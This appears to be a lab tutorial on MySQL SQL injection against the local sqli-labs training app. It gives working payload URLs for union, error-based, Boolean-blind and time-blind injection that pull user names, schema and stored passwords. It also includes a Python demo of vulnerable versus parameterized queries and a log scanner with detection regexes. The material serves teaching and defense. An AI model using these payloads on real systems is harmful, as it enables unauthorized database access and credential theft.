Article directory
- 1. Common functions of MYSQL database
- 2. MYSQL default 4 system databases and key libraries and tables
- 3. Determine the database type
- 4. Union query injection
  - 1. Specific steps (lab demonstration):
    - 1) First determine the injection point
    - 2) Determine whether it is numeric or character type
    - 3) Determine the number of columns at the injection point
    - 4) Get the display positions of the database data in the web page
    - 5) Construct a POC to query the user name and database name
    - 6) Check all table names in the database
    - 7) Find out all field names of a specific table
    - 8) Query all data in the users table
    - 9) Use another way to view the data
- 5. Error-based injection
  - 1. Commonly used error-reporting functions in MYSQL:
  - 2. Error-based injection steps (lab demonstration)
    - 1) Make sure that database errors are displayed on the page
    - 2) Find the injection point (refer to union injection)
    - 3) Determine whether it is numeric or character type (refer to union injection)
    - 4) Use an error-reporting function to construct the base payload
    - 5) Get the database name and user name
    - 6) Get all table names
    - 7) Get the field names of a specific table (refer to union injection)
    - 8) Obtain data from a specific table (refer to union injection)
  - 3. Error-based injection has a string length limit
- 6. Blind injection
  - 1. Boolean-based blind injection
  - 2. Boolean-based blind injection steps:
    - 1) Find the injection point (refer to union injection)
    - 2) Construct the base payload
    - 3) Get the lengths of the current user name and database name
    - 4) Get the current user name and database name
    - 5) Get the total length of all table names in the current database
    - 6) Get all table names in the current database
    - 7) Get the total length of all field names in the users table
    - 8) Get all field names of the users table
    - 9) Get the length of each row of data in the users table
    - 10) Obtain the target data of the users table
  - 3. Time-based blind injection
  - 4. Time-based blind injection steps:
    - 1) Find the injection point (refer to union injection)
    - 2) Determine whether it is numeric or character type (refer to union injection)
    - 3) Test whether the sleep function is filtered and whether it is executed
    - 4) Get the lengths of the current user name and database name
    - 5) Get the current user name and database name
    - 6) Get the total string length of all table names in the current database (refer to Boolean-based blind injection)
    - 7) Get all table names of the current database (refer to Boolean-based blind injection)
    - 8) Get the total string length of all field names in the users table (refer to Boolean-based blind injection)
    - 9) Get all field names of the users table (refer to Boolean-based blind injection)
    - 10) Obtain the target data of the users table (refer to Boolean-based blind injection)
1. Common functions of MYSQL database
2. MYSQL default 4 system databases and key libraries and tables
Key library: information_schema
3. Determine the database type
For PHP websites, commonly used databases are MYSQL and PostgreSQL.
Determine the database type from the default port:
- MYSQL: 3306
- PostgreSQL: 5432
- MSSQL: 1433
4. Union query injection
Usage scenario: the page has display positions, that is, columns of the query result are echoed in the page.
The UNION operator is used to combine the results of two or more SELECT statements into one result set. The premise is that the SELECT statements must have the same number of columns.
1. Specific steps (lab demonstration):
1) First determine the injection point
As follows:
Here you can determine that the injection point is at the id position
2) Determine whether it is numeric or character type
Test with the 1/1 and 1/0 method.
Neither 1/1 nor 1/0 reports an error and the page does not change, which shows that the parameter is not numeric.
Then append 1 single quote and 2 single quotes directly to test.
1 single quote reports an error but 2 single quotes do not, which shows that this is a character-type injection point.
3) To determine the number of columns of injection points
Use order by; order by is used for sorting. If order by 3 does not report an error but order by 4 does, the table has only 3 columns.
As follows:
POC used:
http://localhost/Less-1/?id=1' order by 4--+
Corresponding SQL statement (<table> stands for the unknown table name):
select * from <table> where id='1' order by 4;  # deliberately made to report an error
4) Get the display position of the database in the web page
After knowing the number of columns, you need to find the display positions in the web page (that is, the columns whose values are shown on the page). You can use union to splice a query that returns no rows together with a self-constructed select statement.
As follows:
http://localhost/Less-1/?id=1
Corresponding SQL statement:
select * from <table> where id='1';
Shown on this page:
Your Login name: Dumb
Your Password: Dumb
http://localhost/Less-1/?id=2
Corresponding SQL statement:
select * from <table> where id='2';
The page shows:
Your Login name: Angelina
Your Password: I-kill-you
Construct a select query whose first part matches no row, for example, change id=1 to id=-1, using the POC:
http://localhost/Less-1/?id=-1' union select 1,2,3--+
Corresponding SQL statement:
select * from <table> where id='-1' union select 1,2,3;
The page shows:
Your Login name: 2
Your Password: 3
In this way, we know that the display positions are the 2nd and 3rd columns of the data table.
5) Construct POC to query user name and database name
Construct the function to be queried on the display position, such as the current user name and database name.
Construct the POC:
http://localhost/Less-1/?id=-1' union select 1,user(),database()--+
Corresponding SQL statement:
select * from <table> where id='-1' union select 1,user(),database();
The page shows:
Your Login name: root@localhost
Your Password: security
This way we know the user name and database name of the current database.
6) Check all table names in the database
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+
Corresponding SQL statement:
select * from <table> where id='-1' union select 1,2,table_name from information_schema.tables where table_schema='security';
The above only outputs the first table name, emails, not all table names, because only one row is shown on the page.
To output all table names, use the group_concat() function to concatenate them into one string.
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Corresponding SQL statement:
select * from <table> where id='-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';
In this way, you will know the names of all the tables in the security database: emails, referers, uagents, users
7) Find out all field names of a specific table
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'--+
Corresponding SQL statement:
select * from <table> where id='-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security';
Now all the field names of all tables in the security database are output here.
There is another problem: usually you only want the field names of the tables holding sensitive data, such as the users table. For that, add a table_name condition. POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
Corresponding SQL statement:
select * from <table> where id='-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';
Now you know all the field names of the users table. Suppose you know the fields: id, username, password.
8) Query all data in the users table
POC used:
http://localhost/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+
Corresponding SQL statement:
select * from users where id='-1' union select 1,group_concat(username),group_concat(password) from users;
In this way, all user names and passwords have been found, and at the same time we also know that the table behind the display positions is the users table.
Beautify it:
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,group_concat(username,'^',password) from users--+
Corresponding SQL statement:
select * from users where id='-1' union select 1,2,group_concat(username,'^',password) from users;
9) Use another way to view the data
You can also use concat() together with limit instead of group_concat() to view the table data one row at a time.
POC used:
http://localhost/Less-1/?id=-1' union select 1,2,concat(username,'^',password) from users limit 0,1--+
Corresponding SQL statement:
select * from users where id='-1' union select 1,2,concat(username,'^',password) from users limit 0,1;
This way you can look at them one by one.
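As an added example (not from the original post): the Less-1 pattern above, reproduced in Python so the effect of each step can be checked offline. SQLite stands in for MySQL (an assumption; the quoting, order by and UNION behaviour shown are the same), and the users rows are constructed from the values shown above. The parameterized lookup beside the vulnerable one shows why the same inputs stop being SQL once the id is bound instead of pasted into the query.

```python
import sqlite3

# Constructed stand-in for the sqli-labs "security" database used above
# (assumption: SQLite replaces MySQL so the block runs offline).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer, username text, password text)")
    con.executemany("insert into users values(?,?,?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return con

def lookup_vulnerable(con, user_id):
    """The Less-1 pattern: the request parameter is pasted into the SQL text,
    so a single quote in it closes the literal and the remainder runs as SQL."""
    sql = "select * from users where id='%s' limit 0,1" % user_id
    return con.execute(sql).fetchall()

def lookup_safe(con, user_id):
    """Bound parameter: the value is handed to the driver separately and is
    never parsed as SQL, so quotes, UNION and comments stay literal text."""
    sql = "select * from users where id=? limit 0,1"
    return con.execute(sql, (user_id,)).fetchall()

def probe(lookup, user_id):
    """Run one lookup on a fresh database and return either its rows or the
    database error text (the signal the order-by column-count test relies on)."""
    con = make_db()
    try:
        return lookup(con, user_id)
    except sqlite3.OperationalError as e:
        return "error: %s" % e

# Inputs from the walkthrough above; the '--+' of the URL decodes to '-- '.
ID_NORMAL = "1"
ID_ORDER_BY_4 = "1' order by 4 -- "      # one more column than the table has
ID_UNION = "-1' union select 1,2,3 -- "   # no real row, so the UNION row is shown

if __name__ == "__main__":
    for pid in (ID_NORMAL, ID_ORDER_BY_4, ID_UNION):
        print("vulnerable:", probe(lookup_vulnerable, pid))
        print("safe:      ", probe(lookup_safe, pid))
```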
5. Error-based injection
Usage scenario: database error messages are displayed on the page.
1. Commonly used error-reporting functions in MYSQL:
1) floor()
Common injection syntax format:
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.tables group by x) a);
2) extractvalue()
extractvalue(xml_frag, xpath_expr)
Extracts a value from an XML string using XPath syntax.
xml_frag: the XML document object, a string.
xpath_expr: a path in XPath syntax.
If the xpath_expr parameter does not conform to XPath syntax, an error is reported. The ~ symbol (ASCII code 0x7e) does not exist in XPath syntax, so once ~ is used in the xpath_expr parameter, an error is reported.
Common injection syntax format (extractvalue takes two parameters):
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3) updatexml()
Common injection syntax format:
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user())),1));
4) geometrycollection()
Common injection syntax format:
select * from test where id=1 and geometrycollection((select * from(select user())a)b);
5) multipoint()
Common injection syntax format:
select * from test where id=1 and multipoint((select * from(select user())a)b);
6) polygon()
Common injection syntax format:
select * from test where id=1 and polygon((select * from(select user())a)b);
7) multipolygon()
Common injection syntax format:
select * from test where id=1 and multipolygon((select * from(select user())a)b);
8) linestring()
Common injection syntax format:
select * from test where id=1 and linestring((select * from(select user())a)b);
9) multilinestring()
Common injection syntax format:
select * from test where id=1 and multilinestring((select * from(select user())a)b);
10) exp()
Common injection syntax format:
select * from test where id=1 and exp(~(select * from(select user())a));
11) gtid_subset()
Common injection syntax format:
select gtid_subset(user(),1);
2. Error-based injection steps (lab demonstration)
1) Make sure that database errors are displayed on the page
2) Find the injection point (refer to union injection)
3) Determine whether it is numeric or character type (refer to union injection)
4) Use an error-reporting function to construct the base payload
The updatexml() function is used here. If the second parameter of this function contains special characters, an error is reported. Here 0x7e is the hexadecimal ASCII code of "~".
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,0x7e,1)--+
Corresponding SQL statement:
select * from users where id='1' and updatexml(1,0x7e,1);
5) Get the database name and user name
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1)--+
Corresponding SQL statement:
select * from users where id='1' and updatexml(1,concat(0x7e,database()),1);
6) Get all table names
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
Corresponding SQL statement:
select * from users where id='1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1);
7) Get the field names of a specific table (refer to union injection)
8) Obtain data from a specific table (refer to union injection)
3. Error-based injection has a string length limit
The functions commonly used for error-based injection have a limit on the output length: at most 32 characters are shown. If you use the group_concat() function directly, the output will be incomplete.
Example:
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,'^',password) from users)),1)--+
In this way, only 32 characters are output and the whole content cannot be shown;
at this point you need to use limit to output the rows one by one:
POC used:
http://localhost/Less-1/?id=1' and updatexml(1,concat(0x7e,(select concat(username,'^',password) from users limit 0,1)),1)--+
6. Blind injection
1. Boolean-based blind injection
Usage scenario: there are no display positions on the page, and database query errors are not displayed either. The page only has two kinds of response, query correct and query error, as in the following situation:
Normal: true
Add 1 single quote: false
Add 2 single quotes: true
2. Boolean-based blind injection steps:
1) Find the injection point (refer to union injection)
2) Construct the base payload
POC used (true condition):
http://localhost/Less-8/?id=1' and 1=if(1=1,1,0)--+
POC used (false condition):
http://localhost/Less-8/?id=1' and 1=if(1=2,1,0)--+
3) Get the lengths of the current user name and database name
POC used:
http://localhost/Less-8/?id=1' and 1=if(length(user())=8,1,0)--+
Then use Burp Suite (BP) to brute-force the length.
In this way, you find that the user name string length is 14. Using the same method, the length of the current database name is 8.
4) Get the current user name and database name
Method 1:
http://localhost/Less-8/?id=1' and 1=if(mid(user(),1,1)='q',1,0)--+
You can also use BP to brute-force with two payload positions:
the first payload position is the character index, so just use numbers;
the second payload position is the character itself, so use English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.
In this way, the current user name is brute-forced: root@localhost. The current database name can be obtained the same way: security
Method 2:
When the substring functions are filtered and cannot be used, use like with '_'.
Taking the example above: the string length of the current user name is already known to be 14, and now the user name itself is needed.
POC used:
http://localhost/Less-8/?id=1' and 1=if(user()+like+'______________',1,0)--+
The return value here is true, because the underscore "_" in a LIKE pattern matches any single character.
In this way, we can use BP to brute-force the user name position by position.
5) Get the length of all table names in the current database
Construct the POC:
http://localhost/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=10--+
Using BP brute-forcing, the length obtained here is 29.
6) Get the names of all table names in the current database
Construct the POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a'--+
Use BP to brute-force.
The length obtained above is 29, so the first payload dictionary is the positions 1 to 29.
The second payload dictionary contains English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.
So you know that all the table names are: emails, referers, uagents, users
7) Get the total length of all field names in the users table
Construct the POC:
http://localhost/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=10--+
Same BP brute-forcing.
In this way, we know that the total string length of the field names of the users table is 20
8) Get all field names of the users table
Construct the POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='a'--+
Also using BP brute-forcing, the field names of the users table are obtained: id, username, password
9) Get the total length of each row of all data in the users table
Construct the POC:
http://localhost/Less-8/?id=1' and length((select concat(username,'^',password) from users limit 0,1))=10--+
Start BP brute-forcing.
In this way, you find that the table has 13 rows in total, and the string length of each row after concat splicing.
10) Obtain the target data of the users table
Since we already know the field names of the table, the number of data rows, and the total string length of each spliced row, we can brute-force it row by row.
POC used:
http://localhost/Less-8/?id=1' and mid((select concat(username,'^',password) from users limit 0,1),1,1)='a'--+
I won't go into detail about the specific BP brute-forcing; the operation is similar.
3. Time-based blind injection
The page has only one kind of response: true. Whatever value is entered, the response looks normal. Add a time function (sleep) and judge whether the injected statement is correct from the difference in the web page's response time.
For example:
4. Time-based blind injection steps:
1) Find the injection point (refer to union injection)
2) Determine whether it is numeric or character type (refer to union injection)
3) Test whether the sleep function is filtered and whether it will be executed
Response time with sleep(1): 13158 milliseconds
Response time with sleep(0): 16 milliseconds
This shows that the sleep() function is executed.
4) Get the current username and database length
POC used:
http://localhost/Less-48/?sort=1 and if(length(user())=10,sleep(1),1)--+
Here, if the guessed length is correct, sleep(1) is executed.
Brute-force with BP; below, the response time column needs to be ticked in the results.
There is an extra column of options. Since sleep(1) is executed on the correct guess, the one with the longest response time is the correct result, which is 14 here. In the same way, the length of the database name is brute-forced as 8.
5) Get the current user name and database name
http://localhost/Less-48/?sort=1 and if(mid(user(),1,1)='a',sleep(1),1)--+
Then use BP to brute-force; the second payload dictionary must contain English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.
Here the user name brute-forced character by character is: root@localhost; similarly, the database name obtained by the same method is: security.
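As an added example (not from the original post) showing the defender's side of the four techniques above: the URL-decoded query strings in web-server access logs carry the keywords and function names that the union, error-based, Boolean-based and time-based steps rely on, so they can be flagged. The log lines and the client IP are constructed, and the regexes are a starting point to tune for your application, not a complete rule set.

```python
import re
from urllib.parse import unquote_plus

# Combined-log request line: client IP and the request path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')

# Functions the error-based section relies on (floor only together with rand, as in its payload).
ERROR_FUNCS = ("updatexml", "extractvalue", "exp", "gtid_subset", "geometrycollection",
               "multipoint", "polygon", "multipolygon", "linestring", "multilinestring")

# One signature per technique from the walkthrough, matched on the decoded query string.
SIGNATURES = {
    "union":   re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b|\border\s+by\s+\d+", re.I),
    "error":   re.compile(r"\b(%s)\s*\(|\bfloor\s*\(\s*rand\b" % "|".join(ERROR_FUNCS), re.I),
    "boolean": re.compile(r"\b(if|mid|substr|substring|length|ascii)\s*\(", re.I),
    "time":    re.compile(r"\bsleep\s*\(", re.I),
    "schema":  re.compile(r"information_schema\.|\bgroup_concat\s*\(", re.I),
}

def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if none).
    unquote_plus turns the '+' of '--+' into the space that MySQL's '-- ' comment needs."""
    return unquote_plus(path.partition("?")[2])

def classify(query):
    """Return the sorted technique names whose signature matches the decoded query."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def scan(log_text):
    """Parse access-log lines and return (ip, path, techniques) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = classify(decode_query(m["path"]))
        if found:
            hits.append((m["ip"], m["path"], found))
    return hits

# Constructed sample log: one normal request, then one request per technique above.
LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /Less-1/?id=1'%20order%20by%204--+ HTTP/1.1" 500 231
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /Less-1/?id=-1'%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='security'--+ HTTP/1.1" 200 640
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /Less-1/?id=1'%20and%20updatexml(1,concat(0x7e,database()),1)--+ HTTP/1.1" 200 305
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /Less-8/?id=1'%20and%201=if(length(user())=14,1,0)--+ HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:58:33 +0000] "GET /Less-48/?sort=1%20and%20if(mid(user(),1,1)='r',sleep(1),1)--+ HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for ip, path, techniques in scan(LOG):
        print(ip, ",".join(techniques), path)
```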